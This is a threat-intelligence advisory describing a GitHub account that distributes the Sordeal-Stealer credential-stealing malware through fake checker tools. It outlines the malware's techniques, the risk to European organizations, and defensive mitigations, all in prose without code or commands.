This threat involves a malicious GitHub user account identified as 'okkz' that distributes malicious code repositories, notably including tools such as the Sordeal-Stealer malware. The campaign leverages GitHub as a platform to host and disseminate malicious payloads disguised as legitimate repositories, including 'Tiktok-Username-Checker', 'Steam-ID-Checker', 'Discord-Token-Checker', and others. The malicious code includes capabilities for keylogging (MITRE ATT&CK T1056.001), GUI input capture (T1056.002), browser session hijacking (T1185), and exfiltration of stolen data over alternative protocols (T1048). The threat actor uses PowerShell scripts to disable Windows Defender features such as real-time monitoring, intrusion prevention, script scanning, and controlled folder access, thereby evading detection and facilitating persistence. The malware collects sensitive user input, browser session tokens, and other credentials, then exfiltrates this data covertly. Indicators include multiple URLs hosted on rentry.co that serve raw payloads, which the malware fetches dynamically. No patches or fixes are currently available, and no known exploits in the wild have been reported. The campaign is assessed with medium severity due to its capability to steal sensitive information and evade endpoint defenses, though it requires user interaction to clone or run the malicious repositories. The threat is persistent, with a perpetual lifetime, and certainty of 50%, indicating moderate confidence in ongoing activity. The use of OSINT tools and social engineering to lure victims into executing the malware is a key tactic. Overall, this campaign represents a sophisticated supply chain and social engineering threat vector leveraging trusted development platforms to distribute credential-stealing malware.

For European organizations, this threat poses a significant risk to confidentiality and integrity of user credentials and session tokens, potentially leading to unauthorized access to corporate accounts, internal systems, and cloud services. The keylogging and GUI input capture capabilities can result in leakage of sensitive data such as passwords, two-factor authentication tokens, and personal identifiable information. Browser session hijacking may allow attackers to bypass authentication controls and impersonate users. The disabling of endpoint security features increases the likelihood of successful infection and persistence. Organizations relying on GitHub-hosted open-source tools or OSINT utilities are particularly vulnerable if developers or users inadvertently clone or execute these malicious repositories. This could lead to data breaches, account takeovers, and lateral movement within networks. The exfiltration over alternative protocols complicates detection and response efforts. While no direct availability impact is noted, the compromise of credentials can indirectly disrupt operations through fraud or ransomware attacks. The campaign's medium severity suggests a moderate but tangible threat, especially to sectors with high reliance on open-source software development, such as technology, finance, and government entities in Europe.

1. Implement strict code provenance policies: Enforce that only vetted and trusted repositories are used in development and operational environments. 2. Use automated scanning tools integrated with CI/CD pipelines to detect and block malicious code or suspicious repositories before deployment. 3. Educate developers and users about the risks of cloning and executing unverified GitHub repositories, emphasizing verification of author reputation and repository integrity. 4. Monitor PowerShell execution policies and restrict the ability to disable security features like Windows Defender via Group Policy or endpoint management solutions. 5. Employ endpoint detection and response (EDR) solutions capable of detecting behavioral indicators such as keylogging, GUI input capture, and unusual network exfiltration patterns. 6. Regularly audit and monitor user accounts and session tokens for anomalous activity indicative of session hijacking. 7. Restrict use of alternative protocols for data exfiltration through network segmentation and firewall rules. 8. Maintain up-to-date threat intelligence feeds to identify and block known malicious URLs and domains associated with this campaign. 9. Encourage multi-factor authentication (MFA) and credential rotation to limit the impact of stolen credentials. 10. Conduct regular security awareness training focusing on social engineering and supply chain risks related to open-source software.